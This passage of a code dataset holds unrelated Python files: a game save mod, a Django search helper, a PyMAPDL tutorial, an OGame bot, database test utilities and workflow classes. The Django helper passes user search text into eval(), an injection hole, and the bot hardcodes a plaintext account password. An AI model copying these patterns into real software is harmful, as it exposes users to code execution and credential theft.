stash\n save_bank = save_json\n else:\n save_bank = save_json.get(\"Bank\", list())\n\n with open(self.LOAD_PATH if caller.MaxSlots != 4 else self.STASH_PATH, \"w\") as fp:\n dump = {\"Weapons\": save_bank.get(\"Weapons\", list()), \"Items\": save_bank.get(\"Items\", list())}\n\n if is_wpn:\n dump[\"Weapons\"].append(self.get_weapon_from_data(def_data))\n else:\n dump[\"Items\"].append(self.get_item_from_data(def_data))\n save_json[\"Bank\"] = dump\n json.dump(save_json, fp, indent=4)\n\n def save_backpack(self, fd, SaveGame, bank): # we also need the bank to not overwrite it, we will append it again\n dump = {}\n inventory = []\n curr_equipped = []\n for WeaponSaveGameData in SaveGame.WeaponData:\n defdata = WeaponSaveGameData.WeaponDefinitionData\n if WeaponSaveGameData.Quickslot < 1:\n inventory.append(self.get_weapon_from_data(defdata))\n else:\n curr_equipped.append((WeaponSaveGameData.Quickslot, self.get_weapon_from_data(defdata)))\n curr_equipped.sort()\n dump[\"Wpn_Equipped\"] = [x[1] for x in curr_equipped]\n dump[\"Weapons\"] = inventory\n\n inventory = []\n curr_equipped = []\n for InventorySaveGameData in SaveGame.ItemData:\n defdata = InventorySaveGameData.DefinitionData\n if not InventorySaveGameData.bEquipped:\n inventory.append(self.get_item_from_data(defdata).copy())\n else:\n curr_equipped.append(self.get_item_from_data(defdata))\n dump[\"Itm_Equipped\"] = curr_equipped\n 
dump[\"Items\"] = inventory\n dump[\"Bank\"] = bank\n json.dump(dump, fd, indent=4)\n logging.logger.debug(f\"Successfully wrote to {fd}\")\n\n def on_save_game(self, params):\n if self.get_player_controller() and self.get_player_controller().Pawn:\n read_f = open(self.LOAD_PATH, \"r\")\n try: # This case only happens when the .json is completely empty, then it cant be decoded\n bank = json.load(read_f).get(\"Bank\", dict())\n except:\n bank = dict()\n read_f.close()\n logging.logger.debug(f\"Trying to write to {self.LOAD_PATH}\")\n with open(self.LOAD_PATH, \"w\") as file:\n self.save_backpack(file, params.SaveGame, bank)\n\n def compare_and_load(self):\n inv_manager = self.get_player_controller().GetPawnInventoryManager()\n logging.logger.debug(f\"Found InventoryManager as: {self.get_full_name(inv_manager) if inv_manager else None}\")\n with open(self.LOAD_PATH, \"r\") as file:\n logging.logger.debug(f\"Successfully opened file {self.LOAD_PATH}\")\n try:\n json_save_file = json.load(file)\n for weapons in json_save_file[\"Weapons\"]:\n my_weap_def = tuple(value if isinstance(value, int)\n else FindObject(\"Object\", value) for value in weapons.values())\n # inv_manager.AddBackpackWeaponFromDefinitionData(my_weap_def)\n inv_manager.ClientAddWeaponToBackpack(my_weap_def, 1, False)\n for slot, weapons in enumerate(json_save_file[\"Wpn_Equipped\"]):\n my_weap_def = tuple(value if isinstance(value, int)\n else FindObject(\"Object\", value) for value in weapons.values())\n inv_manager.AddBackpackWeaponFromDefinitionData(my_weap_def)\n # inv_manager.ClientAddWeaponToBackpack(my_weap_def, 1, True)\n # inv_manager.ServerReadyWeaponFromBackpack(my_weap_def, slot + 1, 1)\n\n for items in json_save_file[\"Items\"]:\n my_item_def = tuple(value if isinstance(value, int)\n else FindObject(\"Object\", value) for value in items.values())\n # inv_manager.AddBackpackItemFromDefinitionData(my_item_def)\n inv_manager.ClientAddItemToBackpack(my_item_def, 1, 1, False)\n for items in json_save_file[\"Itm_Equipped\"]:\n my_item_def = tuple(value if isinstance(value, int)\n else FindObject(\"Object\", value) for value in items.values())\n inv_manager.AddBackpackItemFromDefinitionData(my_item_def)\n # inv_manager.ClientAddItemToBackpack(my_item_def, 1, 1, True)\n logging.logger.debug(f\"Successfully loaded the .json!\")\n except Exception as e:\n logging.logger.debug(e)\n logging.logger.debug(f\"{file} is empty or not a .json!\")\n\n def bank_on_open(self, caller):\n if caller.MaxSlots == 4:\n caller.ChestSlots = self.stash_size\n # we opened the stash\n read_f = open(self.STASH_PATH, \"r\")\n bank = json.load(read_f)\n else:\n read_f = open(self.LOAD_PATH, \"r\")\n bank = json.load(read_f).get(\"Bank\", dict())\n read_f.close()\n owner = self.get_player_controller().Pawn\n\n static_wweapon = unrealsdk.FindAll(\"WillowWeapon\")[0]\n static_witem = unrealsdk.FindAll(\"WillowItem\")[0]\n\n bank_things = []\n for weapon in bank.get(\"Weapons\", list()):\n item_def = tuple(value if isinstance(value, int)\n else FindObject(\"Object\", value) for value in weapon.values())\n new_weapon = static_wweapon.CreateWeaponFromDef(item_def, owner, True)\n\n bank_things.append((new_weapon.Class, tuple(), new_weapon))\n\n for item in bank.get(\"Items\", list()):\n item_def = tuple(value if isinstance(value, int)\n else FindObject(\"Object\", value) for value in item.values())\n new_item = static_witem.CreateItemFromDef(item_def, owner, 1, True)\n\n bank_things.append((new_item.Class, tuple(), new_item))\n caller.TheChest = 
bank_things\n        caller.ChestIsOpen = True\n        return False\n\n    def bank_on_close(self, caller):\n        if caller.MaxSlots == 4:\n            read_f = open(self.STASH_PATH, \"r\")\n            save_json = json.load(read_f)\n        else:\n            read_f = open(self.LOAD_PATH, \"r\")\n            save_json = json.load(read_f)\n        read_f.close()\n        wweapon_class = unrealsdk.FindClass(\"WillowWeapon\")\n\n        bank = {\"Weapons\": list(), \"Items\": list()}\n        for chest_data in caller.TheChest:\n            if not chest_data.Inventory:\n                break\n\n            if chest_data.Inventory.Class == wweapon_class:\n                bank[\"Weapons\"].append(self.get_weapon_from_data(chest_data.Inventory.DefinitionData))\n            else:\n                bank[\"Items\"].append(self.get_item_from_data(chest_data.Inventory.DefinitionData))\n            chest_data.Inventory.Destroy()\n            chest_data.Inventory = None\n\n        self.get_player_controller().OnChestClosing(caller)\n        caller.ChestIsOpen = False\n\n        with open(self.LOAD_PATH if caller.MaxSlots != 4 else self.STASH_PATH, \"w\") as f:\n            if caller.MaxSlots == 4:\n                json.dump(bank, f, indent=4)\n            else:\n                save_json[\"Bank\"] = bank\n                json.dump(save_json, f, indent=4)\n        return False\n\n    def check_load_json_is_valid(self):\n        if self.LOAD_PATH is None:\n            return False\n        with open(self.LOAD_PATH, \"r\") as file:\n            try:\n                json.load(file)\n                logging.logger.debug(f\"{self.LOAD_PATH} is valid JSON.\")\n\n                return True\n            except Exception as e:\n                # we could not load the json or work with it, so instead load the original .sav items\n                logging.logger.error(e)\n                self.b_new_save = True\n                logging.logger.debug(f\"{self.LOAD_PATH} is invalid JSON.\")\n                return False\n","sub_path":"Constructor/bl2pysave.py","file_name":"bl2pysave.py","file_ext":"py","file_size_in_byte":18088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"508977608","text":"'''Sort the bytes of a BMP image'''\n\ndef BMP_sort():\n    path = input(\"Photo: \")\n    with open(path, \"rb\") as file:\n        data = file.read()\n    path_2 = input(\"File name: \")\n    out = open(path_2, \"wb\")  # write a fresh file; append mode (\"ab\") would corrupt an existing image\n    out.write(data[:54])\n    image_bytes = data[54:]\n    pixels = [image_bytes[i:i+3] for i in range(0, len(image_bytes), 3)]\n    for i in sorted(pixels):\n        out.write(i)\n    out.close()\n\nif __name__ == \"__main__\":\n    BMP_sort()","sub_path":"BMP_sort.py","file_name":"BMP_sort.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"501995535","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom django.db.models import Q\nfrom products.models import Product\nfrom .models import Users\nfrom .models import Calificaciones\nfrom .models import Product_extras\n\nimport re\nimport datetime\n\nbusqueda_esquema = {\n'nombre' : \"Q(Nombre__icontains = 'ABCDEFG' )\",\n'categoria' : \"Q(Categoria__icontains = 'ABCDEFG' )\",\n'estado' : \"Q(Estado__icontains = 'ABCDEFG' )\",\n'municipio' : \"Q(Municipio__icontains = 'ABCDEFG' )\",\n'colonia' : \"Q(Colonia__icontains = 'ABCDEFG' )\",\n}\n\n\n\ndef coincidencia(texto_entrada):\n\t#print \"texto entrada ::\", texto_entrada\n\tif texto_entrada != \"\":\n\t\t\n\t\tsentencia = \"\" \n\t\tterminos_busqueda = texto_entrada.split(' ')\n\t\tfor cada_termino in terminos_busqueda:\n\t\t\tconsulta = \"\" \n\t\t\tfor cada_restriccion in busqueda_esquema:\n\t\t\t\tconsulta += busqueda_esquema[cada_restriccion] + \" | \"\n\t\t\tconsulta = re.sub(\"ABCDEFG\", cada_termino, consulta)\n\t\t\tconsulta = consulta[:len(consulta)-2]\n\t\t\tsentencia += \"Product.objects.filter(\"+consulta+\") & \"\n\t\t\n\t\tproductos_encontrados = eval(sentencia[:len(sentencia)-2])\n\t\t\t\n\t\treturn productos_encontrados\n\t\n\telse:\n\t\treturn []\n\ndef productos_comentados_ciudad(prod_max, ciudad):\n\tproductos_base = Product.objects.filter(Q(Estado__icontains=ciudad)|Q(Municipio__icontains=ciudad)).values_list('id', flat=True)\n\t#print productos_base\n\tcalificaciones_positivas = Calificaciones.objects.filter(Q(calificacion_producto__gte=3)).values_list('product_id', flat=True)\n\t#print calificaciones_positivas\n\tproductos_mejor_comentados = []\n\ti = 0\n\tfor cada_producto in productos_base:\n\t\tif cada_producto in calificaciones_positivas:\n\t\t\tproductos_mejor_comentados.append(Product.objects.get(pk=cada_producto))\n\t\t\ti += 1\n\t\t\tif i>prod_max:\n\t\t\t\treturn productos_mejor_comentados\n\n\treturn productos_mejor_comentados\n\n\n\ndef productos_nuevos(prod_max, dias):\n\tfecha_comparacion = datetime.date.today() - datetime.timedelta(days=dias)\n\n\tproductos_base = Product_extras.objects.filter(Q(Fecha_alta__gt=fecha_comparacion)).values_list('Product_id', flat=True)\n\n\tproductos_nuevos = []\n\ti = 0\n\tfor cada_producto in productos_base:\n\t\tproductos_nuevos.append(Product.objects.get(pk=cada_producto))\n\t\ti += 1\n\t\tif i>prod_max:\n\t\t\treturn productos_nuevos\n\n\treturn productos_nuevos\n\n\t\n\n\n\n\n\n\n\n","sub_path":"entrega _abril/recommender/products/busqueda.py","file_name":"busqueda.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"383049035","text":"\"\"\"\n.. _ref_mapdl_math_basic:\n\nPyMAPDL APDLMath Basic Operations\n---------------------------------\n\nThis tutorial shows how you can use PyMAPDL to perform basic\noperations on APDLMath vectors and matrices in the APDL memory\nworkspace.\n\nThe `ansys.mapdl.math` submodule gives access to APDLMath features\ninside PyMAPDL.\n\n\"\"\"\nimport numpy as np\n\nfrom ansys.mapdl.core import launch_mapdl\n\n# Start MAPDL as a service and create an APDLMath object.\nmapdl = launch_mapdl()\nmm = mapdl.math\n\n\n###############################################################################\n# Create and Manipulate Vectors\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Create 2 APDLMath vectors of size 5. :math:`\vec{v}` is initialized with\n# ones, :math:`\vec{w}` is filled with random values.\n#\n# Corresponding APDLMath commands:\n# - `*VEC,V,D,ALLOC,5`\n# - `*INIT,V,CONST,1`\n# - `*VEC,W,D,ALLOC,5`\n# - `*INIT,W,RAND`\n\nv = mm.ones(5)\nw = mm.rand(5)\nprint(w)\n\n\n###############################################################################\n# Use operators on vectors\n# ~~~~~~~~~~~~~~~~~~~~~~~~\n# Just like `numpy` arrays, PyMAPDL APDLMath vectors support most of the\n# standard operators (e.g. ``+, -, +=, -=, *=``)\n#\n# Here we form :math:`\vec{z}=\vec{v}+\vec{w}`\n#\n# Then we compute :math:`\|z\|_2` (the default `norm` is nrm2, but you\n# can use `.norm('nrm1')` or `.norm('nrminf')` for different norms).\n# See `help(z.norm)` for additional details.\n#\n# APDLMath Commands:\n# - `*VEC,Z,D,COPY,V`\n# - `*AXPY,1,,W,1,,Z`\n\nz = v + w\nz.norm()\n\n\n###############################################################################\n# Methods\n# ~~~~~~~\n# Alternatively you can use methods, following the numpy\n# standards. 
Available methods are:\n#\n# - `mm.add()`\n# - `mm.subtract()`\n# - `mm.dot()`\n#\n# Equivalent operator:\n# `z = v + w`\n#\n# Equivalent APDLMath Commands:\n# - `*VEC,Z,D,COPY,V`\n# - `*AXPY,1,,W,1,,Z`\nz = mm.add(v, w)\nz.norm()\n\n###############################################################################\n# Subtraction\n#\n# Equivalent operator:\n# z = v - w\n#\n# Equivalent APDLMath Commands:\n# - `*VEC,Z,D,COPY,V`\n# - `*AXPY,-1,,W,1,,Z`\nz = mm.subtract(v, w)\nprint(z)\n\n\n###############################################################################\n# Dot product of 2 vectors\n#\n# Equivalent APDLMath Command: `*DOT,V,W,dotval`\n\nvw = mm.dot(v, w)\nprint(\"Dot product :\", str(vw))\n\n\n###############################################################################\n# Perform in-place operations (without copying vectors)\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#\n# In-Place Addition\n#\n# MAPDL Commands:\n# - `*AXPY,1,,V,1,,Z`\n# - `*PRINT,Z`\nv += v\nprint(v)\n\n\n###############################################################################\n# In-Place Multiplication\n#\n# MAPDL Command: `*SCAL,v,2`\nv *= 2\nprint(v)\n\n###############################################################################\n# In-Place Division\n#\nv /= 2.0\nprint(v)\n\n\n###############################################################################\n# Working with Dense Matrices\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Allocate two dense matrices with random values.\n#\n# MAPDL Commands:\n#\n# - `*DMAT,m1,D,ALLOC,4,5`\n# - `*INIT,m1,RAND`\n# - `*DMAT,m1,D,ALLOC,4,5`\n# - `*INIT,m1,CONST,1`\n\nm1 = mm.rand(4, 5)\nm2 = mm.ones(4, 5)\nm1, m2\n\n###############################################################################\n# **Add** these 2 dense matrices, and **scale** the result matrix.\n#\n# MAPDL Commands:\n# - `*DMAT,m3,D,COPY,m1`\n# - `*AXPY,1,,m2,1,,m3`\nm3 = m1 + m2\nprint(m3)\n\nm3 *= 2\nprint(m3)\n\n###############################################################################\n# **Transpose** a Matrix\n#\nm4 = m3.T\nprint(m4)\n\n\n###############################################################################\n# As for vectors, methods are also available as an alternative to operators.\nm3 = mm.add(m1, m2)\nprint(m3)\n\n\n###############################################################################\n# Compute a matrix-matrix multiplication\n#\nmw = m3.dot(m4)\nprint(mw)\n\n\n###############################################################################\n# APDLMath matrices can be identified by printing, viewing their types, or by using the `__repr__` method by simply typing out the variable\n#\n# APDLMath Matrix\n# ~~~~~~~~~~~~~~~\ntype(m1)\nprint(m1)\nm1\n\n\n###############################################################################\n# APDLMath Vector\n#\ntype(w)\nprint(w)\nw\n\n###############################################################################\n# Numpy methods on APDLMath objects\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Regardless of the underlying APDLMath object type, you are generally\n# able to perform most numpy or scipy operations on these arrays. You\n# can do this one of two ways. 
First, you can convert a matrix to a numpy array:\napdl_mat = mm.rand(5, 5)\nnp_mat = apdl_mat.asarray()\nprint(np_mat)\n\n\n###############################################################################\n# Alternatively, you can simply use numpy to compute the max of the array\n#\n# This works because PyMAPDL copies over the matrix to the local\n# Python memory and then computes the max using numpy.\nprint(np.max(apdl_mat))\n\n\n###############################################################################\n# This works for most numpy operations, but keep in mind that\n# operations that are supported within MAPDL (such as adding or\n# multiplying arrays) will compute much faster as the data is not copied.\n#\napdl_arr = mm.rand(5, 5)\nnp_array = apdl_arr.asarray()\nprint(np.allclose(apdl_arr, np_array))\n\n###############################################################################\n# Stop MAPDL\n# ~~~~~~~~~~\n#\nmapdl.exit()\n","sub_path":"examples/01-apdlmath-examples/basic_operations.py","file_name":"basic_operations.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"626183645","text":"import settings\nfrom seleniumAPI import OgameAPI\nfrom builder import Builder\nfrom farmer import Farmer\nfrom timer import Timer\n\nimport time\nfrom random import randint\n\nINF = 9999999\n\nclass Bot:\n\n    def __init__(self, email, password, universe):\n        self.api = OgameAPI(email=email, password=password, universe=universe)\n\n    def sleep(self, sleep_time=INF):\n        if sleep_time == INF:\n            sleep_time = randint(1, 5000)\n        settings.logger.info('Sleeping for ' + str(sleep_time) + ' seconds.')\n        time.sleep(sleep_time)\n\n\n    def build_resources_on_all_planets(self):\n        builder = Builder()\n\n        planets = self.api.get_all_planets()\n        min_resource_building_time = INF\n\n        for planet in planets:\n            self.api.go_to_planet(planet=planet)\n            self.api.update_planet_resources_info(planet=planet)\n            self.api.update_planet_resource_buildings_info(planet=planet)\n\n            build_time = builder.build_next_resource_or_storage_building(api=self.api, planet=planet)\n\n            min_resource_building_time = min(min_resource_building_time, build_time)\n\n        return min_resource_building_time\n\n    def handle_planet(self, planet):\n        builder = Builder()\n        farmer = Farmer()\n\n        build_time = 0\n        farmer_wait_time = 0\n\n        self.api.update_planet(planet=planet)\n\n        # If the mines are below a certain level, build mines. 
After, begin farming operations\n if planet.resource_buildings['metal_mine']['level'] < 9:\n build_time = builder.build_next_resource_or_storage_building(api=self.api, planet=planet)\n else:\n # Conduct farming operations first in case building tech is necessary.\n farmer_wait_time = farmer.conduct_farming_operations(api=self.api, planet=planet)\n\n self.api.update_planet(planet=planet)\n\n build_time = builder.build_next_resource_or_storage_building(api=self.api, planet=planet)\n\n if build_time == 0:\n build_time = builder.get_minimum_time_to_build_next_preferred_resources_building(api=self.api, planet=planet)\n\n return min(build_time, farmer_wait_time)\n\n def handle_all_planets(self):\n planets = self.api.get_all_planets()\n\n for planet in planets:\n sleep_time = self.handle_planet(planet=planet)\n\n self.sleep(sleep_time)\n\n def start(self):\n\n if self.api.login():\n settings.logger.info(\"Login success.\")\n else:\n settings.logger.info(\"Login failed.\")\n\n resources_build_wait_time = INF\n while True:\n\n if self.api.logged_in:\n sleep_time = self.handle_all_planets()\n\n else:\n self.api.login()\n\n\nif __name__ == \"__main__\":\n bot = Bot(email='jared.s.earl123@gmail.com', password='4awdrgyJ####', universe='Zibal')\n bot.start()\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"57058761","text":"\"\"\"Provide a mixin class for DesDbi sub-classes meant for testing.\n\nClasses:\n DBTestMixin - Adds methods to a DesDbi sub-class that are useful for\n database access test suites.\n\nSince this is a mixin class, it isn't useful to instantiate it alone or\ncreate subclasses that do not have other parent classes.\n\nDeveloped at:\nThe National Center for Supercomputing Applications (NCSA).\n\nCopyright (C) 2011 Board of Trustees of the University of Illinois.\nAll rights reserved.\n\"\"\"\n\nimport random\n\n\nclass DBTestMixin (object):\n \"\"\"A mixin class to add testing functionality to a DesDbi sub-class.\n\n This class defines a number of methods that typically cannot stand on their\n own. 
Instead they add functionality to a subclass of coreutils.DesDbi.\n\n The added methods are useful for test suites for database access methods.\n \"\"\"\n\n def __init__(self):\n # Do not invoke parent class's constructor since this class is meant\n # to be used as a parent class of some other subclass of DesDbi and it\n # should invoke (possibly through other parents) its constructor.\n pass\n\n def sequence_create(self, seq_name):\n \"\"\"Create the specified sequence with default initial configuration.\n \"\"\"\n curs = self.cursor()\n try:\n curs.execute('CREATE SEQUENCE %s' % seq_name)\n finally:\n curs.close()\n\n def sequence_recreate(self, seq_name):\n \"\"\"Drop and create the specified sequence with default configuration.\n\n This method returns a context manager, so it may be used in a with\n statement.\n \"\"\"\n self.sequence_drop(seq_name)\n self.sequence_create(seq_name)\n\n class Ctxtmgr:\n \"\"\"A simple context manager the drops a sequence when complete.\n \"\"\"\n\n def __init__(self, con, seq):\n self.con = con\n self.seq = seq\n\n def __enter__(self):\n pass\n\n def __exit__(self, typ, val, traceback):\n self.con.sequence_drop(self.seq)\n\n return Ctxtmgr(self, seq_name)\n\n def table_copy_empty(self, copy_table, src_table):\n \"\"\"Create an empty copy of the source table.\n\n The copy must not already exist.\n\n With the current implementation, the copy will not have any\n constraints, triggers, indexes, etc. except for NOT NULL constraints.\n This means that some operations could succeed on the copy, but fail on\n the source table.\n \"\"\"\n stmt = 'CREATE TABLE %s AS SELECT * FROM %s WHERE 0 = 1' % (\n copy_table, src_table)\n cursor = self.cursor()\n cursor.execute(stmt)\n cursor.close()\n\n def table_can_query(self, table):\n \"\"\"Return Boolean indicating whether table can be queried.\n\n Attempt to retrieve zero rows from the indicated object and return the\n results. If an exception is raised, leave the connection in a usable\n state.\n\n This method can be used to determine whether some table-like object\n with the specified name exists and the current user has permissions to\n select from it; however, it does not ensure that the object is a table\n or that the object exists in any particular schema. The provided table\n name can include a schema prefix to test for the latter case.\n \"\"\"\n curs = self.cursor()\n\n svp = '\"svp_table_query_%s\"' % random.randint(0, 9999999)\n curs.execute('SAVEPOINT ' + svp)\n try:\n curs.execute('SELECT 1 FROM %s WHERE 0 = 1' % table)\n ret = True\n except Exception:\n curs.execute('ROLLBACK TO SAVEPOINT ' + svp)\n ret = False\n finally:\n curs.close()\n\n return ret\n\n def table_create(self, table, columns, types=None):\n \"\"\"Create a simple table.\n\n Create the specified table. 
The columns and types arguments specify the\n        table definition in ways that depend on their type, providing a number\n        of convenient invocation options to minimize clutter in a test suite.\n\n            columns   types     interpretation\n            --------  --------  --------------------------------------------\n            string    None      columns contains the entire table definition\n            string    string    columns names a single column and types\n                                provides its type\n            sequence  None      each entry in columns provides the full\n                                definition for a column or other table\n                                attribute\n            sequence  string    each entry in columns names a column and\n                                types provides a single type for all columns.\n            sequence  sequence  each entry in columns names a column and the\n                                corresponding entry in types provides its type.\n        \"\"\"\n        if types is None:\n            if hasattr(columns, '__iter__'):\n                spec = ','.join(columns)\n            else:\n                spec = columns\n        elif hasattr(types, '__iter__'):\n            spec = ','.join(['%s %s' % col for col in zip(columns, types)])\n        elif hasattr(columns, '__iter__'):\n            spec = ','.join(['%s %s' % (col, types) for col in columns])\n        else:\n            spec = columns + ' ' + types\n\n        cursor = self.cursor()\n        try:\n            cursor.execute('CREATE TABLE %s (%s)' % (table, spec))\n        finally:\n            cursor.close()\n\n    def table_prep_test_copy(self, test_table, src_table, cols, rows):\n        \"\"\"Prepare a copy of an existing table for testing purposes.\n\n        Drop test_table if it exists. Create a copy of src_table. Insert rows\n        into cols of test_table. The cols and rows arguments correspond to\n        those arguments of DesDbi.insert_many().\n\n        Note that test_table and src_table can be the same if the database is\n        configured to automatically access that table in some other schema if\n        it doesn't exist in the current user's schema and is configured to\n        create new tables in the current user's schema.\n        \"\"\"\n        self.table_drop(test_table)\n        self.table_copy_empty(test_table, src_table)\n        self.insert_many(test_table, cols, rows)\n\n    def table_recreate(self, table, columns, types=None):\n        \"\"\"Drop (if necessary) and create the indicated table.\n\n        The columns and types arguments are the same as for table_create().\n\n        This method also returns a context manager, so it may be used in a with\n        statement.\n        \"\"\"\n        self.table_drop(table)\n        self.table_create(table, columns, types)\n\n        class Ctxtmgr:\n            \"\"\"A simple context manager that drops a table when complete.\n            \"\"\"\n\n            def __init__(self, con, tab):\n                self.con = con\n                self.tab = tab\n\n            def __enter__(self):\n                pass\n\n            def __exit__(self, typ, val, traceback):\n                self.con.table_drop(self.tab)\n\n        return Ctxtmgr(self, table)\n","sub_path":"python/despydb/dbtestmixin.py","file_name":"dbtestmixin.py","file_ext":"py","file_size_in_byte":7068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"379926834","text":"from flask import Flask,render_template,url_for\napp = Flask(__name__)\n\nposts = [\n    {\n        'author': 'Andi',\n        'title' : 'Buku Bacaan',\n        'content' : 'First time',\n        'date' : '13 August 2000'\n    },\n    {\n        'author': 'Budi',\n        'title' : 'Buku Dongeng',\n        'content' : 'Second time',\n        'date' : '13 April 2000'\n    }\n]\n\n@app.route(\"/\")\n@app.route(\"/home\")\ndef home():\n    return render_template(\"home_page.html\",posts=posts)\n\n@app.route(\"/about\")\ndef about():\n    return render_template(\"about_page.html\",title = 'About')\n\nif __name__ == '__main__':\n    
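# Note: debug=True turns on Flask's auto-reloader and interactive debugger; disable it in production.\n    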
app.run(debug=True)\n","sub_path":"Novice/03.03/tutorial_flask_render_template.py","file_name":"tutorial_flask_render_template.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"210902981","text":"from __future__ import annotations\n\nimport traceback\nfrom collections import defaultdict\nfrom contextlib import contextmanager\nfrom dataclasses import dataclass, field\nfrom typing import TYPE_CHECKING, Callable, Dict, List, Optional\n\nfrom dcp.data_format.base import DataFormat\nfrom dcp.storage.base import Storage, ensure_storage\nfrom loguru import logger\nfrom snapflow.core.data_block import (\n DataBlock,\n DataBlockMetadata,\n ManagedDataBlock,\n StoredDataBlockMetadata,\n)\nfrom snapflow.core.environment import Environment, EnvironmentConfiguration\nfrom snapflow.core.function import DEFAULT_OUTPUT_NAME, DataFunction\nfrom snapflow.core.function_interface_manager import StreamInput\nfrom snapflow.core.graph import DeclaredGraph, NxAdjacencyList, graph_from_node_configs\nfrom snapflow.core.metadata.orm import FrozenPydanticBase, PydanticBase\nfrom snapflow.core.node import DataFunctionLog, DeclaredNode, Node, NodeConfiguration\nfrom sqlalchemy.sql.expression import select\n\n\nclass ExecutionLogger:\n def __init__(self, out: Callable = lambda x: print(x, end=\"\")):\n self.out = out\n self.curr_indent = 0\n self.indent_size = 4\n\n @contextmanager\n def indent(self, n=1):\n self.curr_indent += n * self.indent_size\n yield\n self.curr_indent = max(self.curr_indent - n * self.indent_size, 0)\n\n def log(self, msg: str, prefix=\"\", suffix=\"\", indent: int = 0):\n total_indent = self.curr_indent + indent * self.indent_size\n lines = msg.strip(\"\\n\").split(\"\\n\")\n full_prefix = total_indent * \" \" + prefix\n sep = suffix + \"\\n\" + full_prefix\n message = full_prefix + sep.join(lines) + suffix\n self.out(message)\n if msg.endswith(\"\\n\"):\n self.out(\"\\n\")\n\n def log_token(self, msg: str):\n self.out(msg)\n\n\nclass ExecutionConfiguration(FrozenPydanticBase):\n env_config: EnvironmentConfiguration\n local_storage_url: str\n target_storage_url: str\n target_format: str = None\n storage_urls: List[str] = None\n # runtime_urls: List[str] = None\n # run_until_inputs_exhausted: bool = True # TODO: punt on repeated runs for now, v confusing\n # TODO: this is a \"soft\" limit, could imagine a \"hard\" one too\n execution_timelimit_seconds: Optional[int] = None\n logger: str = None # TODO: how to specify this in serializable way?\n\n\n@dataclass(frozen=True)\nclass ExecutionContext:\n env: Environment\n local_storage: Storage\n target_storage: Storage\n target_format: Optional[DataFormat] = None\n storages: List[Storage] = None\n logger: ExecutionLogger = field(default_factory=ExecutionLogger)\n execution_timelimit_seconds: Optional[int] = None\n abort_on_function_error: bool = False\n execution_config: ExecutionConfiguration = None\n\n @staticmethod\n def from_config(cfg: ExecutionConfiguration) -> ExecutionContext:\n env = Environment.from_config(cfg.env_config)\n return ExecutionContext(\n env=env,\n local_storage=ensure_storage(cfg.local_storage_url),\n target_storage=ensure_storage(cfg.target_storage_url),\n target_format=None, # TODO: from config\n storages=[ensure_storage(s) for s in cfg.storage_urls],\n # logger=ExecutionLogger(), # TODO: from config\n execution_timelimit_seconds=cfg.execution_timelimit_seconds,\n abort_on_function_error=env.settings.abort_on_function_error,\n 
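# keep the raw config around so an equivalent context can be rebuilt from a\n            # serialized ExecutionConfiguration (see Executable.from_config below)\n            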
execution_config=cfg,\n )\n\n\nclass ExecutableConfiguration(FrozenPydanticBase):\n node_key: str\n function_key: str\n execution_config: ExecutionConfiguration\n nodes: Dict[str, NodeConfiguration]\n\n\n@dataclass(frozen=True)\nclass Executable:\n node: Node\n function: DataFunction\n execution_context: ExecutionContext\n executable_config: ExecutableConfiguration = None\n # graph_adjacency: NxAdjacencyList # Graph is implied by node_key (nodes only belong to one graph)\n\n @staticmethod\n def from_config(cfg: ExecutableConfiguration) -> Executable:\n ec = ExecutionContext.from_config(cfg.execution_config)\n graph = graph_from_node_configs(ec.env, cfg.nodes.values())\n return Executable(\n node=graph.get_node(cfg.node_key),\n function=ec.env.get_function(cfg.function_key),\n execution_context=ec,\n executable_config=cfg,\n )\n\n\n# @dataclass\n# class DataBlockSummary:\n# id: str\n# record_count: Optional[int] = None\n# alias: Optional[str] = None\n\n\nclass ExecutionResult(PydanticBase):\n inputs_bound: List[str]\n non_reference_inputs_bound: List[str]\n input_block_counts: Dict[str, int]\n output_blocks: Optional[Dict[str, Dict]] = None\n error: Optional[str] = None\n traceback: Optional[str] = None\n\n @classmethod\n def empty(cls) -> ExecutionResult:\n return ExecutionResult(\n inputs_bound=[],\n non_reference_inputs_bound=[],\n input_block_counts={},\n )\n\n def set_error(self, e: Exception):\n tback = traceback.format_exc()\n self.error = (\n str(e) or type(e).__name__\n ) # MUST evaluate true if there's an error!\n # Traceback can be v large (like in max recursion), so we truncate to 5k chars\n self.traceback = tback[:5000]\n\n def get_output_block(\n self, env: Environment, name: Optional[str] = None\n ) -> Optional[DataBlock]:\n\n if not self.output_blocks:\n return None\n if name:\n dbid = self.output_blocks[name][\"id\"]\n else:\n dbid = self.output_blocks[DEFAULT_OUTPUT_NAME][\"id\"]\n env.md_api.begin() # TODO: hanging session\n block = env.md_api.execute(\n select(DataBlockMetadata).filter(DataBlockMetadata.id == dbid)\n ).scalar_one()\n mds = block.as_managed_data_block(env)\n return mds\n\n\nclass CumulativeExecutionResult(PydanticBase):\n input_block_counts: Dict[str, int] = {}\n output_blocks: Optional[Dict[str, List[Dict]]] = {}\n error: Optional[str] = None\n traceback: Optional[str] = None\n\n def add_result(self, result: ExecutionResult):\n for i, c in result.input_block_counts.items():\n self.input_block_counts[i] = self.input_block_counts.setdefault(i, 0) + c\n for i, dbs in result.output_blocks.items():\n self.output_blocks.setdefault(i, []).append(dbs)\n if result.error:\n self.error = result.error\n self.traceback = result.traceback\n\n def get_output_blocks(\n self, env: Environment, name: 